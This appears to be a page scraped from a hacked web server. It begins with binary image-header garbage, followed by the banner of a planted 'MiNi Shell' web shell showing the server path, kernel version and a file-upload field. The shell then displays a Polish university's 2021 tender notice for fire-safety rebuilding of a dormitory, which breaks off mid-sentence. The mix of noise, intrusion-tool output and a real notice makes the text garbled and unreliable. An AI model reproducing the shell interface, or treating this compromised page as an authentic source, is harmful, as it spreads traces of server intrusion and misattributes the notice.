JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210805/0013835701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00138357 z dnia 2021-08-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostosowanie budynku Domu Asystenta nr 3 przy ulicy Paderewskiego 32 w Katowicach do<br/>obowiązujących przepisów ppoż. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet Śląski w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001347</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bankowa 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-007</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0323591334</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@us.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dzp.us.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostosowanie budynku Domu Asystenta nr 3 przy ulicy Paderewskiego 32 w Katowicach do<br/>obowiązujących przepisów ppoż. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed512e67-f4f4-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00138357</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/us <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/us</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Komunikacja w niniejszym postępowaniu , w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcami, odbywa się przy<br/>użyciu środków komunikacji elektronicznej. 2) Postępowanie prowadzone jest w języku polskim, w<br/>formie elektronicznej za pośrednictwem platformy zakupowej o nazwie platformazakupowa.pl (zwanej<br/>dalej także: „platformą”) pod adresem: https://platformazakupowa.pl/pn/us; 3) Zamawiający będzie<br/>przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformy. Informacje<br/>dotyczące wniosków o wyjaśnienie treści SWZ, zmiany treści SWZ, zmiany terminu składania i<br/>otwarcia ofert, Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty” oraz na stronie<br/>internetowej prowadzonego postępowania. Korespondencja, której zgodnie z obowiązującymi<br/>przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl do konkretnego wykonawcy; 4) Zamawiający, zgodnie z § 11<br/>ust. 2 Rozp. PRM z 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie; dalej: “Rozporządzenie w sprawie<br/>środków komunikacji”), określił w SWZ niezbędne wymagania sprzętowo - aplikacyjne umożliwiające<br/>pracę na platformazakupowa.pl. 5) Rekomendacje. a) Formaty plików wykorzystywanych przez<br/>wykonawców powinny być zgodne z Rozp. RM z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz.U. z 2017 r.<br/>2247); b) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf; c) W celu ewentualnej kompresji danych Zamawiający rekomenduje<br/>wykorzystanie jednego z formatów:- .zip - .7Z; d) Do formatów uznanych za powszechne a nie<br/>występujących w rozporządzeniu należą: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich<br/>plikach zostaną potraktowane za złożone nieskutecznie; e) Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na<br/>ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi max 5MB; f) Ze względu na niskie ryzyko naruszenia integralności pliku<br/>orazłatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie<br/>plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PadES; g)<br/>Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca<br/>powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym; h)Zamawiający zaleca, aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego<br/>samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanym może<br/>doprowadzić do problemów w weryfikacji plików. 6) Forma oferty. a) Ofertę oraz wszelkie dokumenty<br/>elektroniczne przekazuje się w postępowaniu przy użyciu środków komunikacji elektronicznej<br/>wskazanych zgodnie z art. 67 ustawy Pzp przez Zamawiającego, a więc za pośrednictwem<br/>platformazakupowa.pl, pod adresem: https://platformazakupowa.pl/pn/us; b) Ofertę należy złożyć w<br/>formie elektronicznej (postać elektroniczna opatrzona kwalifikowanym podpisem elektronicznym) lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub osobistym, w języku polskim, zgodnie z<br/>przepisami prawa oraz dokumentami zamówienia; c) Szczegółowe informacje zawiera SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych: klauzula informacyjna<br/>dotycząca przetwarzania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w<br/>celu związanym z postępowaniem o udzielenie zamówienia publicznego oraz obowiązki informacyjne<br/>Wykonawcy wynikające z RODO zostały określone w rozdziale XVI ust. 5 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.381.012.2021.RBK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących przebudowę<br/>budynku Domu Asystenta nr 3 Uniwersytetu Śląskiego przy ul. Paderewskiego 32 w Katowicach,<br/>w celu dostosowania go do obowiązujących przepisów przeciwpożarowych.<br/>2) Roboty budowlane będą prowadzone na czynnym (użytkowanym) i zamieszkanym obiekcie.<br/>Wykonawca zobowiązany jest prowadzić roboty budowlane objęte przedmiotem zamówienia w<br/>dwóch (2) etapach określonych w projekcie wykonawczym. Przystąpienie do wykonania<br/>drugiego z etapów robót może rozpocząć się dopiero po całkowitym zakończeniu pierwszego<br/>etapu realizacji inwestycji. Ponadto w ramach każdego z dwóch (2) etapów roboty budowlane<br/>należy prowadzić z podziałem na poszczególne kondygnacje budynku. Wykonanie robót na<br/>kolejnej kondygnacji budynku może rozpocząć się dopiero z chwilą zakończenia robót na<br/>poprzedniej kondygnacji. Ponadto Wykonawca zobowiązany jest udostępniać użytkownikom<br/>obiektu, w sposób ciągły, jedną z dwóch klatek schodowych w ramach każdego z dwóch etapów realizacji inwestycji, w celu zapewnienia właściwej, bezpiecznej komunikacji i warunków<br/>ewakuacji z budynku. Po zakończeniu robót na danej klatce schodowej można przystąpić do<br/>robót na klatce następnej.<br/>3) Szczegółowy opis przedmiotu zamówienia oraz jego zakres określono w dokumentacji<br/>projektowej (załącznik nr 2 do SWZ), składającej się z: projektu budowlanego, projektu<br/>wykonawczego dla poszczególnych branż, przedmiarów robót (załączone przedmiary robót mają<br/>wyłącznie charakter pomocniczy, Zamawiający nie wymaga złożenia kosztorysów wraz z ofertą,<br/>w przypadku złożenia kosztorysów przez Wykonawcę wraz z ofertą, nie będą one podlegały<br/>ocenie na etapie badania i oceny ofert), Specyfikacji Technicznych Wykonania i Odbioru Robót<br/>Budowlanych, decyzji RBDEC-0768/2020 Prezydenta Miasta Katowice z dnia 19.06.2020r.<br/>zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę, postanowień nr<br/>WZ.5595.1.151.2019.MK i WZ.5595.4.70.2019.MK Śląskiego Komendanta Wojewódzkiego<br/>Państwowej Straży Pożarnej z dnia 23.08.2019 r., instrukcji bezpieczeństwa pożarowego, które<br/>to dokumenty wraz ze wzorem umowy (Załącznik nr 3 do SWZ) należy rozpatrywać łącznie.<br/>4) Termin realizacji zamówienia: do 18 miesięcy od daty przekazania terenu budowy.<br/>5) Wykonawca udzieli: minimum 36 miesięcznej gwarancji na wykonane roboty budowlane.<br/>Okres rękojmi wynosi 5 lat </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111290-7 - Roboty przygotowawcze do świadczenia usług</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262700-8 - Przebudowa budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45421141-4 - Instalowanie przegród</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45421160-3 - Instalowanie wyrobów metalowych</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45432100-5 - Kładzenie i wykładanie podłóg</p> <p class="mb-0">45442000-7 - Nakładanie powierzchni kryjących</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Za ofertę najkorzystniejszą zostanie uznana oferta przedstawiająca<br/>najkorzystniejszy stosunek jakości do ceny, a więc zawierająca najkorzystniejszy bilans punktów w<br/>kryteriach: a) Cena (C) - 60,00 pkt, b) Okres przedłużenia gwarancji na wykonane roboty<br/>budowlane (G) - 40,00 pkt. 2) Sposób oceny ofert zawiera rozdz. XIII ust. 1 pkt 2) SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres przedłużenia gwarancji na wykonane roboty budowlane (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40.00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z przepisem art. 112 ust. 1 w zw. z art. 266 ustawy Pzp, Zamawiający określa<br/>następujące warunki udziału w postępowaniu. Warunek dotyczący zdolności technicznej lub<br/>zawodowej:<br/>a) w odniesieniu do warunku dotyczącego zdolności technicznej, Zamawiający wymaga, aby<br/>wykonawca wykazał, iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie: wykonał w sposób należyty<br/> co najmniej jedną (1) robotę budowlaną polegającą na przebudowie lub remoncie budynku o<br/>wartości tej roboty 3.500.000,00 zł brutto,<br/> co najmniej jedną (1) robotę budowlaną polegającą na zabudowie ślusarki i/lub stolarki<br/>otworowej, przeciwpożarowej, o wartości tej roboty co najmniej 600.000,00 zł brutto;<br/> co najmniej jedną (1) robotę budowlaną, polegającą na wykonaniu systemu sygnalizacji<br/>pożarowej (obejmującego urządzenia sygnalizacyjno-alarmowe, służące do samoczynnego<br/>wykrywania i przekazywania informacji o pożarze, a także urządzenia odbiorcze alarmów<br/>pożarowych i urządzenia odbiorcze sygnałów uszkodzeniowych), o wartości tej roboty co<br/>najmniej 500.000,00 zł brutto.<br/>Uwagi:<br/>Przez 1 robotę budowlaną Zamawiający rozumie robotę budowlaną wykonaną przez<br/>Wykonawcę na podstawie jednej umowy/jednego zamówienia obejmującej w/w. zakres prac<br/>określony w danym tirecie oraz jego wymaganą wartość. Zamawiający nie dopuszcza<br/>możliwości wykazania warunków udziału w postępowaniu poprzez dzielenie ww. zakresów robót<br/>budowlanych określonych w danym tirecie. Zamawiający dopuszcza możliwość łączenia<br/>spełniania opisanych powyżej warunków udziału w jednym zamówieniu/w ramach jednej umowy.<br/>Pojęcia przebudowy i remontu należy definiować i rozumieć zgodnie z ustawą z dnia 7 lipca<br/>1994 r. Prawo budowlane.<br/>2. Pojęcia systemu sygnalizacji pożarowej (obejmującego urządzenia sygnalizacyjno-alarmowe,<br/>służące do samoczynnego wykrywania i przekazywania informacji o pożarze, a także urządzenia<br/>odbiorcze alarmów pożarowych i urządzenia odbiorcze sygnałów uszkodzeniowych) należy<br/>definiować i rozumieć zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji<br/>z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów<br/>budowlanych i terenów.<br/>3. Zamawiający oceni spełnianie powyższego warunku w oparciu o podmiotowe środki<br/>dowodowe, o których mowa w rozdz. VI ust. 3 pkt 1.<br/>4.<br/>b) odniesieniu do warunku dotyczącego zdolności zawodowej, Zamawiający wymaga, aby<br/>wykonawca wykazał, iż dysponuje lub będzie dysponował osobami zdolnymi do wykonania<br/>niniejszego zamówienia, posiadającymi prawo wykonywania zawodu oraz wymagane<br/>uprawnienia budowlane tj.:<br/> minimum 1 osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia<br/>budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń do kierowania robotami<br/>budowlanymi;<br/> minimum 1 osobą, która będzie pełniła funkcję kierownika robót sanitarnych, posiadającą<br/>uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych,<br/>wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do kierowaniarobotami budowlanymi;<br/> minimum 1 osobą, która będzie pełniła funkcję kierownika robót elektrycznych, posiadającą<br/>uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych bez ograniczeń do kierowania robotami budowlanymi;<br/>Uwagi:<br/>Wymieniony skład osobowy zespołu Wykonawcy należy traktować jako minimalne wymagania<br/>Zamawiającego i nie wyczerpuje całości personelu niezbędnego do rzetelnego wypełnienia<br/>zobowiązań Wykonawcy.<br/>Zamawiający dopuszcza łączenie funkcji osób, o których mowa powyżej pod warunkiem<br/>wykazania się niezbędnym wykształceniem, uprawnieniami budowlanymi i wymaganym<br/>doświadczeniem z zastrzeżeniem, że jedna osoba nie może pełnić więcej niż dwóch funkcji.<br/>Wykonawca winien wykazać się osobami posiadającymi uprawnienia budowlane do<br/>sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z wymaganymi<br/>przepisami ustawy z dn. 07.07.1994 r. Prawo budowlane (t.j. Dz. U. 2020 r. poz. 1333 z późn.<br/>zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r. poz. 831 z późn. zm.) lub innymi uprawnieniami umożliwiającymi<br/>wykonywanie tych samych czynności, do wykonania których w aktualnym stanie prawnym<br/>upoważniają uprawnienia budowlane w tej samej specjalności. Zgodnie z art. 104 ustawy –<br/>Prawo budowlane – osoby, które przed dniem wejścia w życie ustawy (tj. przed dniem<br/>01.01.1995 r.) uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania<br/>zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują<br/>uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>Powyższe oznacza, iż w razie złożenia oferty zawierającej wskazanie osób posiadających<br/>uprawnienia budowlane uzyskane przed 1995 r., wymaga się od Wykonawcy, aby osoby te<br/>posiadały uprawnienia zgodne z zakresem wskazanym w SWZ.<br/>W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium<br/>RP (w tym wydane obywatelom Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej) wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane<br/>w art. 12a ustawy Prawo budowlane (t.j. Dz. U. 2020 r. poz. 1333 z późn. zm.) oraz pozostałych<br/>przepisów ww. ustawy Prawo budowlane oraz ustawy o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2021 r. poz.<br/>78 z późn. zm.) oraz art. 20a ustawy z dn. 15.12.2000 r. o samorządach zawodowych<br/>architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2019 r. poz. 